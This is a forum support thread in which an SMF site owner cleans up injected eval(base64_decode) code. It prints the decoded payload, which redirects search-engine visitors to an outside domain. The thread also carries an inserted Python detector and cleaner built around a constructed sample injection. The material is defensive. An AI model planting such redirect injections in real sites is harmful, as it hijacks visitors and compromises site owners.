 at the beginning of php files

Started by T3CHN0, September 19, 2011, 08:09:04 AM

T3CHN0

Hello


Can anyone tell me what this is in front of my php files.
Display.template.php and load.php so far that's the php files I have noticed it.




<?php
/**
 * Simple Machines Forum (SMF)



I am going to remove it so it looks like this




<?php
/**
 * Simple Machines Forum (SMF)



I hope I don't get any problems doing so,
but please, anyone, let me know if


should be in my files.


cheers

emanuele

No, it shouldn't be in your files at all.
It's fine to remove these chars.

Did you by chance install any mod?


Take a peek at what I'm doing! ;D




Do you need support in Italian?

Help us help you: explain your problem well: no, "it doesn't work" is not an explanation!!
1) What you do,
2) what you expect,
3) what you get.

T3CHN0

Hello
Yes, I have installed many mods. My forum was attacked by a leeching rogue and all my files had
something like this at the beginning of each php file

eval(base64_decode("ZXJyb3JfcmVwb3J0aW5nKDApOw0KJHFhenBsbT1oZWFkZXJzX3NlbnQo
directly after <?php

I upgraded my site from 2.0 rc3 to 2.0 last week but was attacked again 2 days after.
So I rebuilt the whole 2.0 forum again fresh with a new install, but after removing


within about 30 minutes I noticed files started having the
eval(base64_decode(
again, and not long after every php file I edited was leeched again.

I have turned on leech security with my host to try to stop this from happening again,
but any other ideas to protect my site would be appreciated.


At this point in time I am going over every file in my forum 1 by 1 and removing the leech string
to try and recover my forum without having to rebuild another time.


cheers

kat

Maybe... This?

http://custom.simplemachines.org/mods/index.php?mod=2815

I'm curious as to how they keep getting in, though.

Has your host checked their access logs and stuff?

Are they a good host?

T3CHN0

Thank you so much for that link to the firewall mod, I never thought of searching for a firewall mod.

I'm with Bluehost and I have never had a problem with them in the past.
Good speeds and a lot of room for data.


They probably haven't checked access logs and stuff. Am I able to do it?

How they keep getting in: "Well, only a matter of time before a hack is made", that's what we can expect
with anything these days. I don't know how, but it keeps getting in.

I do set all my file permissions to 755 - would that allow access?

Here is the complete leech string. Does anyone know how to decode it and find out where it's directed at?

eval(base64_decode("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"));

MrPhil

Change "eval" to "print" and it should display the code inside, rather than running it. You probably won't like what you see, but it might give you a hint as to how they're getting in. Not only should you clean up all SMF files, but erase all other files on your site that you can't account for. Scan all PCs used to administer your site for spyware and viruses (especially keystroke loggers and password sniffers). Then change all passwords -- FTP, site control panel, SMF admin IDs, etc. Talk to your host about access logs and see if they can see someone getting in.

T3CHN0

Thanks.
I will do all of what you said.


By the way, where would I put the string with print to see anything?
In an empty php file?

T3CHN0

Don't know if this info is any good,
but while cleaning my files I'm back in my themes/default folder and see  is back in my Display.template.php file.
That means whatever it is will keep coming back.


How do I stop that happening?

kat

Quote
I do set all my files permissions to 755 - would that allow access?

I believe that is like having a big notice on your site saying "Please hack me!". (Well, not quite that bad, but...)

Go to Admin>Packages>File permissions.

Set that to "Standard" and I think you'll be better off.

Illori

K@, no, 777 is world-writable/readable; 755 is not.

kat

Yeah, I know.

Would you leave your forum with every file at 775, though?

Illori

They said 755, not 775. 755 is REQUIRED by many servers that are more _secure_. 755 keeps others from being able to view your folders, but files need to be 644, not 755.

MrPhil

Quote from: techno489 on September 19, 2011, 12:59:24 PM
by the way, where would I put the string with print to see anything.
in a empty php file?

<?php
print(base64_decode("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"));
?>


MrPhil

Quote from: Illori on September 19, 2011, 02:24:07 PM
they said 755 not 775, 755 is REQUIRED by many servers that are more _secure_. 755 keeps others from being able to view your folders, but files need to be 644 not 755.
K@ needs a new pair of reading glasses...

kat

You're right, there.

I DID read it as 775.

I blame Runic for late nights in wet fields. ;)

T3CHN0

Quote from: Illori on September 19, 2011, 02:24:07 PM
755 keeps others from being able to view your folders, but files need to be 644 not 755.
So simply, all folders should be 755 and all php files 644


I still can't go to Admin>Packages>File permissions to set file permissions as my forum is still down.
I will do the permissions my self.

I have almost finished removing all leeches and will put my new user name and password
into settings soon to test it and see if my forum is working again.

T3CHN0

Quote from: MrPhil on September 19, 2011, 02:30:09 PM
Quote from: techno489 on September 19, 2011, 12:59:24 PM
by the way, where would I put the string with print to see anything.
in a empty php file?

<?php
print(base64_decode("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"));
?>




I did this and this is what I got.
It means nothing to me.


error_reporting(0);
$qazplm=headers_sent();
if (!$qazplm){
    $referer=$_SERVER['HTTP_REFERER'];
    $uag=$_SERVER['HTTP_USER_AGENT'];
    if ($uag) {
        if (stristr($referer,"yandex") or stristr($referer,"yahoo") or stristr($referer,"google") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com") or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"baidu.com") or stristr($referer,"doubleclick.net") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or stristr($referer,"clickbank.net") or stristr($referer,"blogspot.com") or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) {
            if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
                header("Location: http://prsnbrk.osa.pl/");
                exit();
            }
        }
    }
}


Well, I did everything that was said: forum firewall installed and forum back up and running with all leeching removed.
I will monitor my site as always and if anything happens like this again I will reply
and post to the thread, if that's ok.


cheers

MrPhil

Quote from: techno489 on September 20, 2011, 01:15:24 AM
I did this and this is what I got.
means nothing to me
It means that if any of many popular search engines sent someone to your site, what they will see is some Polish site instead. You've been hijacked.
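As an added defender-side example (not code from this thread or from SMF), the Python script below does what the print trick above does without ever executing the payload: it finds eval(base64_decode("...")) statements in PHP source, decodes them for inspection, flags the traits of the decoded string shown above (error silencing, referrer check, redirect), and strips them. The infected sample file, its payload and the placeholder domain are constructed for the example.

```python
import base64
import re

# Constructed sample of an infected SMF file, in the shape this thread describes:
# an eval(base64_decode("...")) statement wedged between <?php and the SMF header.
# The encoded text is a made-up stand-in (placeholder domain), not the thread's payload.
INJECTED_PHP = ('error_reporting(0); if (stristr($_SERVER["HTTP_REFERER"],"google")) '
                '{ header("Location: http://example.invalid/"); exit(); }')
SAMPLE_FILE = ('<?php\neval(base64_decode("'
               + base64.b64encode(INJECTED_PHP.encode()).decode()
               + '"));\n/**\n * Simple Machines Forum (SMF)\n */\n')

# One eval(base64_decode("...")); statement, with the encoded text captured.
INJECT_RE = re.compile(
    r'eval\s*\(\s*base64_decode\s*\(\s*["\']([A-Za-z0-9+/=\s]+)["\']\s*\)\s*\)\s*;?')
REDIRECT_RE = re.compile(r'header\s*\(\s*["\']Location:\s*([^"\']+)', re.I)

def find_injections(source: str):
    """Return (offset, decoded_text) for every eval(base64_decode(...)) in source.
    This only decodes the string for inspection; nothing is executed."""
    hits = []
    for m in INJECT_RE.finditer(source):
        try:
            decoded = base64.b64decode(m.group(1)).decode('utf-8', 'replace')
        except Exception:
            decoded = '<undecodable base64>'
        hits.append((m.start(), decoded))
    return hits

def classify(decoded: str) -> dict:
    """Flag the traits of the thread's payload: silenced errors, referrer check, redirect."""
    m = REDIRECT_RE.search(decoded)
    return {
        'silences_errors': 'error_reporting(0)' in decoded,
        'checks_referer': 'HTTP_REFERER' in decoded,
        'redirect_to': m.group(1).strip() if m else None,
    }

def clean(source: str) -> str:
    """Strip every injected statement and the empty line it leaves after <?php."""
    return INJECT_RE.sub('', source).replace('<?php\n\n', '<?php\n', 1)

if __name__ == '__main__':
    for offset, decoded in find_injections(SAMPLE_FILE):
        print(f'injection at byte {offset}: {classify(decoded)}')
    print(clean(SAMPLE_FILE))
```

To check a whole forum tree, call find_injections on each .php file's contents and only write clean() output back after reviewing the decoded hits.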

T3CHN0

WOW, thanks for that... hopefully with the forum firewall mod, Bad Behavior mod, Stop Spammers mod, and leech protection from
my host none of this will happen again...

Illori

That will only work if the code you are using is secure and your server is secure. Those mods alone will not stop hackers.
